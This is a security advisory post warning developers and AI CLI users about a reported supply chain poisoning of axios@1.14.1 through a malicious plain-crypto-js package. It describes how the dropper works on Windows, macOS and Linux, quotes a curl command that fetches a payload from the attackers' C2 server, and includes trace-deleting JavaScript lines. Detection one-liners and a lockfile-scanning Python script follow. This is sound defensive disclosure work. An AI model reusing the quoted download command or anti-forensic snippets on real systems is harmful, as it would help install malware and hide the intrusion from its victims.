链求君精选分享
03-31
⚠️⚠️⚠️ Urgent Notice ⚠️⚠️⚠️

Dear developers, especially those using the axios library in Node.js: please check your axios version. This applies not only to developers but also to anyone using AI CLIs (such as Codex or Claude Code) that call MCPs like Open Web Search. When the latest version is installed via npx, axios@1.14.1 gets pulled in, and that version has been hit by supply chain poisoning.

Malicious package: plain-crypto-js@4.2.1 (disguised as crypto-js)
Poisoned axios: axios@1.14.1 (modified, with a plain-crypto-js dependency added)
Affected MCPs: Open Web Search and the npx cache of exa-mcp-server
Malicious behavior: copies PowerShell as wt.exe, executes a remote payload, then self-deletes.

Detailed attack behavior

C2 server: http:/sfrclak.com:8000/6202033

The dropper covers all three platforms.

Windows:
1. Locate the path of powershell.exe.
2. Copy powershell.exe to C:\ProgramData\wt.exe (disguised as Windows Terminal).
3. Write a VBScript to %TEMP%\6202033.vbs that:
   - downloads the payload from the C2 with curl: curl -s -X POST -d "packages.npm.org/product1" "http:/sfrclak.com:8000/6202033"
   - saves it as a .ps1 file
   - runs it through the disguised wt.exe (actually PowerShell) in a hidden window: -w hidden -ep bypass
   - deletes the .ps1 after execution
4. Silently execute the VBS with cscript, then delete the VBS after execution.

macOS:
1. Use curl to download a binary from the C2 to /Library/Caches/com.apple.act.mond (disguised as a system process).
2. Grant permissions with chmod 770.
3. Execute it in the background, then connect back to the C2.
4. Execute via osascript (AppleScript), then delete traces.

Linux:
1. Use curl to download a Python script from the C2 to /tmp/ld.py.
2. Execute it in the background with nohup, then connect back to the C2.

Final destruction of traces:

// Delete setup.js itself
fs.unlink(__filename, (x=>{}));
// Rename package.md to package.json, overwriting the original package.json that contained the postinstall hook
fs.rename("package.md", "package.json", (x=>{}));

Because even package.json is replaced, a dependency check performed after installation will not show that a postinstall script ever existed.

Quick troubleshooting:

npm list axios 2>/dev/null | grep -E "1\.14\.1|0\.30\.4"
grep -A1 '"axios"' package-lock.json | grep -E "1\.14\.1|0\.30\.4"

Check for plain-crypto-js:

ls node_modules/plain-crypto-js 2>/dev/null && echo "POTENTIALLY AFFECTED"

If setup.js has already run, package.json and the rest of that directory will have been replaced with clean stub files, so the mere existence of the directory is sufficient evidence that the dropper executed.

Check for RAT traces on the affected system:

# macOS
ls -la /Library/Caches/com.apple.act.mond 2>/dev/null && echo "COMPROMISED"
# Linux
ls -la /tmp/ld.py 2>/dev/null && echo "COMPROMISED"
:: Windows (cmd.exe)
dir "%PROGRAMDATA%\wt.exe" 2>nul && echo COMPROMISED

This is a zero-day supply chain attack that occurred less than 24 hours ago (March 31, 2026) and has not yet been publicly disclosed by npm or the security community.
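The grep one-liners above only match the line right after the first `"axios"` key, which misses nested copies and the flat `"node_modules/..."` keys of lockfile v2/v3. As an added example (not part of the notice above), this Python scanner parses package-lock.json as JSON, walks both the v1 nested layout and the v2/v3 flat layout, and flags the two axios versions and any plain-crypto-js entry wherever it sits in the tree; the sample lockfiles are constructed, not captured from a real project.

```python
import json

# Indicators as given in the notice above.
BAD_AXIOS_VERSIONS = {"1.14.1", "0.30.4"}
MALICIOUS_PACKAGE = "plain-crypto-js"


def _walk_v1(deps, path, found):
    """lockfileVersion 1: nested 'dependencies' objects keyed by package name."""
    for name, info in (deps or {}).items():
        found.append((path + [name], info.get("version", "")))
        _walk_v1(info.get("dependencies"), path + [name], found)


def lock_entries(lock):
    """Return (install path as a list of package names, version) for every entry."""
    found = []
    packages = lock.get("packages")
    if packages is not None:  # lockfileVersion 2/3: flat map keyed by node_modules path
        for key, info in packages.items():
            # "" describes the root project; split the key into its nesting chain
            parts = [p.rstrip("/") for p in key.split("node_modules/") if p]
            if parts:
                found.append((parts, info.get("version", "")))
    else:
        _walk_v1(lock.get("dependencies"), [], found)
    return found


def scan_lockfile(lock):
    """Return findings as strings; an empty list means no indicator matched."""
    findings = []
    for path, version in lock_entries(lock):
        where = " > ".join(path)
        if path[-1] == "axios" and version in BAD_AXIOS_VERSIONS:
            findings.append(f"poisoned axios@{version} at {where}")
        if path[-1] == MALICIOUS_PACKAGE:
            findings.append(f"malicious {MALICIOUS_PACKAGE}@{version} at {where}")
    return findings


# Constructed sample lockfiles, not captured from a real project.
SAMPLE_V3_LOCK = {"lockfileVersion": 3, "packages": {
    "": {"name": "demo-app"},
    "node_modules/axios": {"version": "1.14.1"},
    "node_modules/axios/node_modules/plain-crypto-js": {"version": "4.2.1"},
    "node_modules/@scope/clean": {"version": "2.0.0"}}}
SAMPLE_V1_LOCK = {"lockfileVersion": 1, "dependencies": {
    "axios": {"version": "1.13.0", "dependencies": {"some-dep": {"version": "1.0.0"}}}}}
```

On a real project call `scan_lockfile(json.load(open("package-lock.json")))`; a non-empty result means the lockfile references the poisoned release or the malicious package and the host should be checked for the RAT traces listed above.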